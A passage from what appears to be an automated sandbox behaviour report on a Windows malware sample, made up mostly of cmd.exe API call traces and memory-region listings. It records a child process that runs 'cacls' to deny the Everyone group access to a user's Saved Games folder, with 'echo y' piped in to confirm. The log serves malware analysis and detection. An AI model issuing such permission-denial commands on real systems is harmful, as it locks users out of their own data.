(hKey=0x40) returned 0x0 [0035.598] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4cea9c | out: phkResult=0x4cea9c*=0x40) returned 0x0 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x0, lpData=0x4ceaa8*=0x40, lpcbData=0x4ceaa0*=0x1000) returned 0x2 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x4, lpData=0x4ceaa8*=0x1, lpcbData=0x4ceaa0*=0x4) returned 0x0 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x0, lpData=0x4ceaa8*=0x1, lpcbData=0x4ceaa0*=0x1000) returned 0x2 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x4, lpData=0x4ceaa8*=0x0, lpcbData=0x4ceaa0*=0x4) returned 0x0 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x4, lpData=0x4ceaa8*=0x9, lpcbData=0x4ceaa0*=0x4) returned 0x0 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x4, lpData=0x4ceaa8*=0x9, lpcbData=0x4ceaa0*=0x4) returned 0x0 [0035.598] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4ceaa4, lpData=0x4ceaa8, lpcbData=0x4ceaa0*=0x1000 | out: lpType=0x4ceaa4*=0x0, lpData=0x4ceaa8*=0x9, lpcbData=0x4ceaa0*=0x1000) returned 0x2 [0035.598] RegCloseKey (hKey=0x40) returned 0x0 [0035.598] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004e [0035.598] srand (_Seed=0x5aa5004e) [0035.598] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0035.598] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0035.598] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.598] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6a4060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0035.598] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.599] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.599] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0035.599] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.599] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0035.599] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0035.599] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0035.599] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0035.599] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0035.599] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0035.599] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0035.599] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0035.599] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0035.599] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4cf87c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x4cf87c, lpFilePart=0x4cf878 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x4cf878*="Desktop") returned 0x1c [0035.599] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0035.599] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4cf5f8 | out: lpFindFileData=0x4cf5f8) returned 0x6a4270 [0035.599] FindClose (in: hFindFile=0x6a4270 | out: hFindFile=0x6a4270) returned 1 [0035.599] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x4cf5f8 | out: lpFindFileData=0x4cf5f8) returned 0x6a4270 [0035.599] FindClose (in: hFindFile=0x6a4270 | out: hFindFile=0x6a4270) returned 1 [0035.599] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0035.599] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x4cf5f8 | out: lpFindFileData=0x4cf5f8) returned 0x6a4270 [0035.599] FindClose (in: hFindFile=0x6a4270 | out: hFindFile=0x6a4270) returned 1 [0035.599] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0035.600] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0035.600] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0035.600] GetEnvironmentStringsW () returned 0x6a60b0* [0035.600] FreeEnvironmentStringsA (penv="=") returned 1 [0035.600] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0035.600] GetConsoleOutputCP () returned 0x1b5 [0035.600] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.600] GetUserDefaultLCID () returned 0x409 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4cf9a8, cchData=128 | out: lpLCData="0") returned 2 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4cf9a8, cchData=128 | out: lpLCData="0") returned 2 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4cf9a8, cchData=128 | out: lpLCData="1") returned 2 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0035.601] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0035.601] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0035.602] GetConsoleTitleW (in: lpConsoleTitle=0x6a4d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.602] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0035.602] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0035.602] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0035.602] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0035.603] _wcsicmp (_String1="echo", _String2=")") returned 60 [0035.603] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0035.603] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0035.603] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0035.603] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0035.603] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0035.603] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0035.603] GetConsoleTitleW (in: lpConsoleTitle=0x4cf698, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.603] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.603] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.603] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.604] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.604] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.604] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.604] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.604] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.604] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.604] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.604] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x4cf654 | out: _Buffer="y\r\n") returned 3 [0035.604] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.604] GetFileType (hFile=0x28) returned 0x3 [0035.604] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.604] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0035.604] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x4cf644, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0x4cf644*=0x3, lpOverlapped=0x0) returned 1 [0035.604] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.604] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0035.604] _get_osfhandle (_FileHandle=1) returned 0x28 [0035.604] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0035.604] _get_osfhandle (_FileHandle=0) returned 0x24 [0035.604] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0035.605] SetConsoleInputExeNameW () returned 0x1 [0035.605] GetConsoleOutputCP () returned 0x1b5 [0035.605] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0035.605] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.605] exit (_Code=0) Process: id = "9" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0xf1e8000" os_pid = "0xb50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"C:\\Users\\5JgHKoaOfdp\\Saved Games\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 452 start_va = 0x360000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 453 start_va = 0x380000 end_va = 0x381fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 454 start_va = 0x390000 end_va = 0x39efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 455 start_va = 0x3a0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 456 start_va = 0x3e0000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 457 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 458 start_va = 0x430000 end_va = 0x430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 459 start_va = 0x440000 end_va = 0x441fff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 460 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 461 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 462 start_va = 0x7f6a0000 end_va = 0x7f6c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6a0000" filename = "" Region: id = 463 start_va = 0x7f6c8000 end_va = 0x7f6c8fff entry_point = 0x0 region_type = private name = "private_0x000000007f6c8000" filename = "" Region: id = 464 start_va = 0x7f6ca000 end_va = 0x7f6cafff entry_point = 0x0 region_type = private name = "private_0x000000007f6ca000" filename = "" Region: id = 465 start_va = 0x7f6cd000 end_va = 0x7f6cffff entry_point = 0x0 region_type = private name = "private_0x000000007f6cd000" filename = "" Region: id = 466 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 467 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 468 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 469 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 479 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 480 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 481 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 482 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 483 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 484 start_va = 0x370000 end_va = 0x373fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 485 start_va = 0x380000 end_va = 0x383fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 486 start_va = 0x450000 end_va = 0x452fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 487 start_va = 0x460000 end_va = 0x460fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 488 start_va = 0x470000 end_va = 0x471fff entry_point = 0x470000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Region: id = 489 start_va = 0x4f0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 490 start_va = 0x5f0000 end_va = 0x66dfff entry_point = 0x5f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 491 start_va = 0x7c0000 end_va = 0x7cffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 492 start_va = 0x7d0000 end_va = 0xaa4fff entry_point = 0x7d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 493 start_va = 0x747f0000 end_va = 0x74814fff entry_point = 0x747f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 494 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 495 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 496 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 497 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 498 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 499 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 500 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 501 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 502 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 503 start_va = 0x7f5a0000 end_va = 0x7f69ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5a0000" filename = "" Thread: id = 11 os_tid = 0xb54 Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xef3a000" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 504 start_va = 0xc20000 end_va = 0xc3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 505 start_va = 0xc40000 end_va = 0xc41fff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 506 start_va = 0xc50000 end_va = 0xc5efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 507 start_va = 0xc60000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 508 start_va = 0xca0000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 509 start_va = 0xda0000 end_va = 0xda3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 510 start_va = 0xdb0000 end_va = 0xdb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 511 start_va = 0xdc0000 end_va = 0xdc1fff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 512 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 513 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 514 start_va = 0x7f550000 end_va = 0x7f572fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f550000" filename = "" Region: id = 515 start_va = 0x7f57b000 end_va = 0x7f57bfff entry_point = 0x0 region_type = private name = "private_0x000000007f57b000" filename = "" Region: id = 516 start_va = 0x7f57c000 end_va = 0x7f57efff entry_point = 0x0 region_type = private name = "private_0x000000007f57c000" filename = "" Region: id = 517 start_va = 0x7f57f000 end_va = 0x7f57ffff entry_point = 0x0 region_type = private name = "private_0x000000007f57f000" filename = "" Region: id = 518 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 519 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 520 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 521 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 522 start_va = 0xf20000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 523 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 524 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 525 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 544 start_va = 0xc20000 end_va = 0xc2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 545 start_va = 0xdd0000 end_va = 0xe4dfff entry_point = 0xdd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 546 start_va = 0x1060000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 547 start_va = 0x1120000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 548 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 549 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 550 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 551 start_va = 0x7f450000 end_va = 0x7f54ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f450000" filename = "" Region: id = 552 start_va = 0xc30000 end_va = 0xc33fff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Thread: id = 12 os_tid = 0xb5c [0035.688] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0035.688] __set_app_type (_Type=0x1) [0035.688] __p__fmode () returned 0x76ea1768 [0035.688] __p__commode () returned 0x76ea176c [0035.688] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0035.688] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0035.688] GetCurrentThreadId () returned 0xb5c [0035.688] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb5c) returned 0x30 [0035.688] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0035.688] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0035.689] SetThreadUILanguage (LangId=0x0) returned 0x409 [0035.690] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0035.690] RegOpenKeyExW (in: hKey=0x80000001, 